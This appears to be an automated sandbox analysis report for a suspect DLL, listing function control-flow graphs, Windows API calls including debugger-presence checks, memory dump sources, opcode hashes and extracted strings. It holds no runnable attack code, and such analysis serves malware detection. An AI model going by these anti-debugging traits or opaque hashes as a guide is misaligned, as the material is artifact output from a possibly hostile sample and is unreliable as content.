                                                                                                                            • String ID: NtQueryInformationProcess$ntdll.dll
                                                                                                                            • API String ID: 4139908857-2906145389
                                                                                                                            • Opcode ID: df04638742c7fc6e8605bbea52f0b1d374aaa7f07c68db413936957ec578f264
                                                                                                                            • Instruction ID: a39bcd8efbcae69af9d477fc09a4e9e5df5984be292c58072ec9b2622447e3b3
                                                                                                                            • Opcode Fuzzy Hash: df04638742c7fc6e8605bbea52f0b1d374aaa7f07c68db413936957ec578f264
                                                                                                                            • Instruction Fuzzy Hash: 62814771A592098FCF06CFBCC3947DEBBF1AB66320F14C52ED425AB254D735990A8B42
                                                                                                                            Function 6D75C69E Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1433 6d75c69e-6d75c6b1 call 6d75cf50 1436 6d75c6b7-6d75c6d9 call 6d75cb38 1433->1436 1437 6d75c6b3-6d75c6b5 1433->1437 1441 6d75c746-6d75c75f call 6d75cdd2 call 6d75cf50 1436->1441 1442 6d75c6db-6d75c71e call 6d75cc03 call 6d75cabf call 6d75cf1b call 6d75c733 call 6d75cda4 call 6d75c740 1436->1442 1438 6d75c720-6d75c72f 1437->1438 1454 6d75c761-6d75c767 1441->1454 1455 6d75c770-6d75c777 1441->1455 1442->1438 1454->1455 1459 6d75c769-6d75c76b 1454->1459 1456 6d75c783-6d75c797 dllmain_raw 1455->1456 1457 6d75c779-6d75c77c 1455->1457 1461 6d75c840-6d75c847 1456->1461 1462 6d75c79d-6d75c7ae dllmain_crt_dispatch 1456->1462 1457->1456 1460 6d75c77e-6d75c781 1457->1460 1464 6d75c849-6d75c858 1459->1464 1465 6d75c7b4-6d75c7c6 call 6d751cc0 1460->1465 1461->1464 1462->1461 1462->1465 1471 6d75c7ef-6d75c7f1 1465->1471 1472 6d75c7c8-6d75c7ca 1465->1472 1475 6d75c7f3-6d75c7f6 1471->1475 1476 6d75c7f8-6d75c809 dllmain_crt_dispatch 1471->1476 1472->1471 1474 6d75c7cc-6d75c7ea call 6d751cc0 call 6d75c69e dllmain_raw 1472->1474 1474->1471 1475->1461 1475->1476 1476->1461 1477 6d75c80b-6d75c83d dllmain_raw 1476->1477 1477->1461
                                                                                                                            APIs
                                                                                                                            • __RTC_Initialize.LIBCMT ref: 6D75C6E5
                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6D75C6FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2442719207-0
                                                                                                                            • Opcode ID: 9fc0d36777d76079caf6829add8cea26766f530796ee58aa6fda39578e2d7170
                                                                                                                            • Instruction ID: 1251aac7638961e716be135d22ec3659c0cb19bd3c4845c854b3d0313761a99a
                                                                                                                            • Opcode Fuzzy Hash: 9fc0d36777d76079caf6829add8cea26766f530796ee58aa6fda39578e2d7170
                                                                                                                            • Instruction Fuzzy Hash: 4441F972D08226AFDB118F59CA44B6E7B74EB4177AF11442BE92467240DF309D21CBD3
                                                                                                                            Function 6D75C74E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1483 6d75c74e-6d75c75f call 6d75cf50 1486 6d75c761-6d75c767 1483->1486 1487 6d75c770-6d75c777 1483->1487 1486->1487 1490 6d75c769-6d75c76b 1486->1490 1488 6d75c783-6d75c797 dllmain_raw 1487->1488 1489 6d75c779-6d75c77c 1487->1489 1492 6d75c840-6d75c847 1488->1492 1493 6d75c79d-6d75c7ae dllmain_crt_dispatch 1488->1493 1489->1488 1491 6d75c77e-6d75c781 1489->1491 1494 6d75c849-6d75c858 1490->1494 1495 6d75c7b4-6d75c7c6 call 6d751cc0 1491->1495 1492->1494 1493->1492 1493->1495 1498 6d75c7ef-6d75c7f1 1495->1498 1499 6d75c7c8-6d75c7ca 1495->1499 1501 6d75c7f3-6d75c7f6 1498->1501 1502 6d75c7f8-6d75c809 dllmain_crt_dispatch 1498->1502 1499->1498 1500 6d75c7cc-6d75c7ea call 6d751cc0 call 6d75c69e dllmain_raw 1499->1500 1500->1498 1501->1492 1501->1502 1502->1492 1503 6d75c80b-6d75c83d dllmain_raw 1502->1503 1503->1492
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3136044242-0
                                                                                                                            • Opcode ID: a75d858b28cab0e1ac2b92da534e8b38258d5e28f18693a694ef196d141bd728
                                                                                                                            • Instruction ID: 1b8b586be4c29b97ae06cfd788ca8b0ccb67ed32e1c2679243242cb41fd485d9
                                                                                                                            • Opcode Fuzzy Hash: a75d858b28cab0e1ac2b92da534e8b38258d5e28f18693a694ef196d141bd728
                                                                                                                            • Instruction Fuzzy Hash: 5321D871D04126AFCB118E59CA44B7F3B78DB416B6B01406AFD245B210DB309D21CBD3
                                                                                                                            Function 6D75C597 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1554 6d75c597-6d75c5a5 call 6d75cf50 call 6d75cc33 1558 6d75c5aa-6d75c5ad 1554->1558 1559 6d75c684 1558->1559 1560 6d75c5b3-6d75c5cb call 6d75cb38 1558->1560 1562 6d75c686-6d75c695 1559->1562 1564 6d75c696-6d75c69d call 6d75cdd2 1560->1564 1565 6d75c5d1-6d75c5e2 call 6d75cb95 1560->1565 1570 6d75c5e4-6d75c606 call 6d75ceef call 6d75cab3 call 6d75cad7 call 6d761159 1565->1570 1571 6d75c631-6d75c63f call 6d75c67a 1565->1571 1570->1571 1590 6d75c608-6d75c60f call 6d75cb6a 1570->1590 1571->1559 1576 6d75c641-6d75c64b call 6d75cdcc 1571->1576 1582 6d75c64d-6d75c656 call 6d75ccf3 1576->1582 1583 6d75c66c-6d75c675 1576->1583 1582->1583 1589 6d75c658-6d75c66a 1582->1589 1583->1562 1589->1583 1590->1571 1594 6d75c611-6d75c62e call 6d76112e 1590->1594 1594->1571
                                                                                                                            APIs
                                                                                                                            • __RTC_Initialize.LIBCMT ref: 6D75C5E4
                                                                                                                              • Part of subcall function 6D75CAB3: InitializeSListHead.KERNEL32(6D7D1CC0,6D75C5EE,6D76FD80,00000010,6D75C57F,?,?,?,6D75C7A7,?,00000001,?,?,00000001,?,6D76FDC8), ref: 6D75CAB8
                                                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D75C64E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3231365870-0
                                                                                                                            • Opcode ID: c0801f7bcd0e4f5b23627ec2ff9c7f37f435cd865807c5c3d5fbdac4f0c5689b
                                                                                                                            • Instruction ID: 614270cd32dbc9026429b5c84127f2f2dc8d8f95170dbfd7f74a3fdb1cec07b0
                                                                                                                            • Opcode Fuzzy Hash: c0801f7bcd0e4f5b23627ec2ff9c7f37f435cd865807c5c3d5fbdac4f0c5689b
                                                                                                                            • Instruction Fuzzy Hash: C821C33164C2869ADF04ABB897187AC77B0DB0233EF15206ADA55671C2DF2246B48767
                                                                                                                            Function 6D7644B1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1597 6d7644b1-6d7644b6 1598 6d7644b8-6d7644d0 1597->1598 1599 6d7644d2-6d7644d6 1598->1599 1600 6d7644de-6d7644e7 1598->1600 1599->1600 1601 6d7644d8-6d7644dc 1599->1601 1602 6d7644f9 1600->1602 1603 6d7644e9-6d7644ec 1600->1603 1605 6d764553-6d764557 1601->1605 1604 6d7644fb-6d764508 GetStdHandle 1602->1604 1606 6d7644f5-6d7644f7 1603->1606 1607 6d7644ee-6d7644f3 1603->1607 1608 6d764535-6d764547 1604->1608 1609 6d76450a-6d76450c 1604->1609 1605->1598 1610 6d76455d-6d764560 1605->1610 1606->1604 1607->1604 1608->1605 1612 6d764549-6d76454c 1608->1612 1609->1608 1611 6d76450e-6d764517 GetFileType 1609->1611 1611->1608 1613 6d764519-6d764522 1611->1613 1612->1605 1614 6d764524-6d764528 1613->1614 1615 6d76452a-6d76452d 1613->1615 1614->1605 1615->1605 1616 6d76452f-6d764533 1615->1616 1616->1605
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 6D7644FD
                                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 6D76450F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3000768030-0
                                                                                                                            • Opcode ID: 39eb7c6af4746dad88b5ae37441d568025d1415d3ff0594c1efcdd223fdf34a3
                                                                                                                            • Instruction ID: 6bd3d810b95341c023f62a6441242f367ba056dacb8d314cd38562fe1597b9a9
                                                                                                                            • Opcode Fuzzy Hash: 39eb7c6af4746dad88b5ae37441d568025d1415d3ff0594c1efcdd223fdf34a3
                                                                                                                            • Instruction Fuzzy Hash: D211B77150C7D346CB214D3D8DA6732BEA4A78B238B24472BE8B5865E2F730D446E263

                                                                                                                            Non-executed Functions

                                                                                                                            Function 6D758320 Relevance: 7.0, Strings: 5, Instructions: 786COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ".u$/%T$/%T$k|xW$qa;F
                                                                                                                            • API String ID: 0-2901583048
                                                                                                                            • Opcode ID: ca8aa2c0a32c1dbbaa3bd1324cbda7f5894b98db3e5b52b88c5700bfc56018d3
                                                                                                                            • Instruction ID: 656c35fadd35b675c8890dd3c34029198a773d8f5879517dedf6c33002177ebb
                                                                                                                            • Opcode Fuzzy Hash: ca8aa2c0a32c1dbbaa3bd1324cbda7f5894b98db3e5b52b88c5700bfc56018d3
                                                                                                                            • Instruction Fuzzy Hash: F242F332A751119FCF09CEBCDAD57DD77F2AB46360F14862AE815DB350CB2A89198B03
                                                                                                                            Function 6D75CDD2 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D75CDDE
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6D75CEAA
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D75CEC3
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6D75CECD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 254469556-0
                                                                                                                            • Opcode ID: a76125b71f653d39fc95006cf1a91607e8f5388c2d2c851e8cdae8fb0fe63c24
                                                                                                                            • Instruction ID: 138c4ad29d4d37ca52b193a04c66d9e25db3d4ed12ac647f5764238c1891933c
                                                                                                                            • Opcode Fuzzy Hash: a76125b71f653d39fc95006cf1a91607e8f5388c2d2c851e8cdae8fb0fe63c24
                                                                                                                            • Instruction Fuzzy Hash: 0C312975D05328DBDF20DFA4C949BCDBBB8AF08304F1041AAE50CAB240EB719A94CF46
                                                                                                                            Function 6D754810 Relevance: 5.9, Strings: 4, Instructions: 943COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Kl$$M QA$M QA$MOZ4
                                                                                                                            • API String ID: 0-3174601671
                                                                                                                            • Opcode ID: 117016816f56092004998bd8f438a85fafafaed9c80ea734e26d878bddb4bdef
                                                                                                                            • Instruction ID: a4a172f4b964d801313946d9f59e0acde2015ed6fac98f58489b22a2935125fe
                                                                                                                            • Opcode Fuzzy Hash: 117016816f56092004998bd8f438a85fafafaed9c80ea734e26d878bddb4bdef
                                                                                                                            • Instruction Fuzzy Hash: DD62F536A641018FCB09CE7CD6D57ED7BF2AB46338F14812AD811DB754DA2A9C1A9F03
                                                                                                                            Function 6D742E00 Relevance: 4.6, Strings: 3, Instructions: 864COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 'yh$dIM;$wydniskkiubezlkwvqgojxpilsggfwgcqedjmuanaxnznjoufauopuhiseqm
                                                                                                                            • API String ID: 0-3009214086
                                                                                                                            • Opcode ID: 4ffe0b7d9dc91c5803b6cf35a0836c5b03a04d451735b32c0907d0f77c8d021e
                                                                                                                            • Instruction ID: 626d2d727dae2b150664cfc112c1d68c03d0249e8dcca10d5c41edae0cd85ac4
                                                                                                                            • Opcode Fuzzy Hash: 4ffe0b7d9dc91c5803b6cf35a0836c5b03a04d451735b32c0907d0f77c8d021e
                                                                                                                            • Instruction Fuzzy Hash: 766216326957018FC726CE3CD7957967BE2BB42720F00CA2DD49BC7B94D626E50A8B43
                                                                                                                            Function 6D760D6C Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6D760E64
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6D760E6E
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6D760E7B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3906539128-0
                                                                                                                            • Opcode ID: 1996a6a077ede4bfbc111e82c8daac1b06bc4fbc458ac91f4e2f865d05a4082a
                                                                                                                            • Instruction ID: 9f3ce40e213a6c8364cd207d78572eb01cbe4d104f1d4290dad25736a788aa2b
                                                                                                                            • Opcode Fuzzy Hash: 1996a6a077ede4bfbc111e82c8daac1b06bc4fbc458ac91f4e2f865d05a4082a
                                                                                                                            • Instruction Fuzzy Hash: 2331D8759013299BCF61DF64D988B9DB7B8BF08310F5041EAE41CA7250EB709B858F56
                                                                                                                            Function 6D749070 Relevance: 4.4, Strings: 3, Instructions: 643COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ;e$yh %$yh %
                                                                                                                            • API String ID: 0-163200961
                                                                                                                            • Opcode ID: 4bf16c27470d11094d26019ba3b243922295a5dbb77f14a1130b8e27a702183f
                                                                                                                            • Instruction ID: 86165a93e743c6c554865da529ca8ff48a4ed1afbe285961d9a31f83ef610c88
                                                                                                                            • Opcode Fuzzy Hash: 4bf16c27470d11094d26019ba3b243922295a5dbb77f14a1130b8e27a702183f
                                                                                                                            • Instruction Fuzzy Hash: E232AE31A542458FCB0ACEECD7847ED7BF2BB9A364F10C52ED955DB398C72698058B02
                                                                                                                            Function 6D743A70 Relevance: 4.3, Strings: 3, Instructions: 552COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: kdeshsbvkrxouoioooyyrfxvggianzzimqzltffojohbbplbnljjkcd$}#8"$}#8"
                                                                                                                            • API String ID: 0-1248395883
                                                                                                                            • Opcode ID: 62c418b979306b6bdc9ba020a744e87d93adc3208c2c05e4cbd74fa0657ca635
                                                                                                                            • Instruction ID: d4030eb73ebc6d602fdb9cd71ccbf8bdebb09695a943c2321f38e6e77946a3d3
                                                                                                                            • Opcode Fuzzy Hash: 62c418b979306b6bdc9ba020a744e87d93adc3208c2c05e4cbd74fa0657ca635
                                                                                                                            • Instruction Fuzzy Hash: 3F122471254B018FC726CE7CC6957967BF1BB46328F10CA2ED46BCB794C626E809DB42
                                                                                                                            Function 6D758EC0 Relevance: 4.3, Strings: 3, Instructions: 522COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: }|7.$}|7.$i
                                                                                                                            • API String ID: 0-3420585137
                                                                                                                            • Opcode ID: b4dba2e81cd8a947aeb1082fcf13f11c485498e1f5e3ed407d5a067cf4d90546
                                                                                                                            • Instruction ID: 9dd9a44979418a3716d01ad06163a72814ef089e5771ef158d416d28b90f6ef8
                                                                                                                            • Opcode Fuzzy Hash: b4dba2e81cd8a947aeb1082fcf13f11c485498e1f5e3ed407d5a067cf4d90546
                                                                                                                            • Instruction Fuzzy Hash: 5602D4B6A681058FCF05CEBCE6957DD7BF1BB56360F00922AE411E7394CB2A8855CB03
                                                                                                                            Function 6D741010 Relevance: 4.2, Strings: 3, Instructions: 468COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,$X$~c
                                                                                                                            • API String ID: 0-4076825437
                                                                                                                            • Opcode ID: 3462cc748af653480c88d6d05f4278b9fee6d1624ab27a8efbc1c6ae26503236
                                                                                                                            • Instruction ID: 33b4c5856eaa2b7dc12d6afe550d0f6bd84791671e187bfc188a81a8db1871d2
                                                                                                                            • Opcode Fuzzy Hash: 3462cc748af653480c88d6d05f4278b9fee6d1624ab27a8efbc1c6ae26503236
